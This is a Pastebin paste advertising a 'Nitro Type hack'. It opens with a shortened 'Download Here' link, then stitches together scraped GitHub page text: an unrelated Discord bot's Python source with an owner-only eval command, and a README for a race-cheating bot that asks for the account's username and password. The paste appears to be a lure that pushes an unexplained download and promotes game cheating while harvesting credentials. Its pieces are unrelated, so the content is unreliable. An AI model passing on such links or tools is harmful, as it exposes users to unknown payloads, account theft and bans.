Advertisement
Guest User

Github nitro type hack

a guest
Nov 14th, 2024
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.73 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/46sfc2pz?id96350522 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. jack123go / jack
  10. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  11. from discord.ext import commands from utils.nitro_type import get_profile from datetime import datetime from db.models import User import secret import asyncio import inspect import discord bot = commands.Bot(command_prefix='!') bot.remove_command('help') bot.start_time = datetime.utcnow() @bot.event async def on_ready(): bot.update_racers = _update_racers cogs = ['register', 'stats', 'sudo', 'about', 'racer', 'help', 'garage', 'unregister', 'tasks'] for cog in cogs: bot.load_extension('commands.%s' % cog) @bot.event async def on_message(m): if m.channel.id == '223233024127533056' and m.author.id != '246467186506334209': await bot.delete_message(m) await bot.process_commands(m) @bot.event async def on_member_remove(m): user = User.select().where(User.id == m.id).first() # User was not registered if not user: return # Removing user from registered users user.delete_instance() await bot.send_message(discord.Object(id='249835423415664640'), '**%s** left the server and has been successfully ' 'unregistered.' % m.display_name) @bot.event async def on_command_error(ex, ctx): original = ex.original if hasattr(ex, 'original') else ex c = discord.Object(id='249835423415664640') e = discord.Embed() e.description = '[]()' e.title = type(original).__name__ e.url = 'http://leekspin.com/' e.set_author(name=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url) e.timestamp = datetime.now() e.add_field(name='Input', value=ctx.message.content, inline=False) e.add_field(name='Error', value=str(original), inline=False) e.add_field(name='Channel', value=ctx.message.channel.mention, inline=False) # Adding information if HTTP error if type(original).__name__ == 'HTTPException': e.add_field(name='Response', value=await ex.original.response.text()) await bot.send_message(c, embed=e) @bot.command(name='eval', hidden=True, pass_context=True) @commands.check(lambda ctx: ctx.message.author.id == '136856172203474944') async def _eval(ctx, *, code): """Evaluates code.""" python = '```py\n' \ '# Input\n' \ '\n\n' \ '# Output\n' \ '' \ '```' env = 'bot': bot, 'ctx': ctx, 'message': ctx.message, 'server': ctx.message.server, 'channel': ctx.message.channel, 'author': ctx.message.author > env.update(globals()) await bot.send_typing(ctx.message.channel) try: result = eval(code, env) if inspect.isawaitable(result): result = await result except Exception as e: await bot.say(python.format(code, type(e).__name__ + ': ' + str(e))) return await bot.say(python.format(code, result or 'N/A')) async def update_racers(): await bot.wait_until_ready() while not bot.is_closed: await asyncio.sleep(60*30) await _update_racers(User.select().execute()) print('Updated profiles. ') async def _update_racers(users): # Updating users for user in users: server = bot.get_server('223233024127533056') duser = server.get_member(user.id) profile = await get_profile(user.nitro_name) # Checking if profile could be found if not profile or not duser: print("User's profile not found. Unregistering them. %s" % user.id) # Unregistering if the user no longer has a Nitro Type account if duser: await bot.cogs['Unregister'].update_discord_user(bot, duser, user) # Deleting model as user is no longer in server else: user.delete_instance() continue # Updating discord user print('Updating %s. ' % duser.id, end='') try: await bot.cogs['Register'].update_discord_user(duser, bot, profile, server.roles, False) except Exception as e: print(str(e)) continue print('Done') bot.loop.create_task(update_racers()) bot.run(secret.BOT_TOKEN)
  12. celestialking659/nitrotyperhack
  13. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  14. Name already in use
  15. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  16. Sign In Required
  17. Please sign in to use Codespaces.
  18. Launching GitHub Desktop
  19. If nothing happens, download GitHub Desktop and try again.
  20. Launching GitHub Desktop
  21. If nothing happens, download GitHub Desktop and try again.
  22. Launching Xcode
  23. If nothing happens, download Xcode and try again.
  24. Launching Visual Studio Code
  25. Your codespace will open once ready.
  26. There was a problem preparing your codespace, please try again.
  27. Latest commit
  28. Git stats
  29. Files
  30. Failed to load latest commit information.
  31. README.md
  32. This is a nitro type bot you can use to gain races on nitro type. Here is how to use it.
  33.  
  34. Go to https://replit.com/repls
  35. Create a new script for HTML Javascript and CSS.
  36. Paste the index.html code into the html section
  37. After you click run button you will see the code pop up. Above the thing that says NITRO TYPER BOT is a link. copy the link.
  38. Paste the link into your web browser(works in google and safari)
  39. enter the username of your account you want to bot on in the username
  40. enter the password of the account you want to bot on in the password
  41. enter the wpm that you want the bot to type
  42. enter the accuracy that you want the bot to type
  43. enter the amount of races you want the bot to type
  44. The bot will reduce the amount of races you do so that you reduce the chance of getting banned.
  45. If you need help, dm me on discord @some guy#3637
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement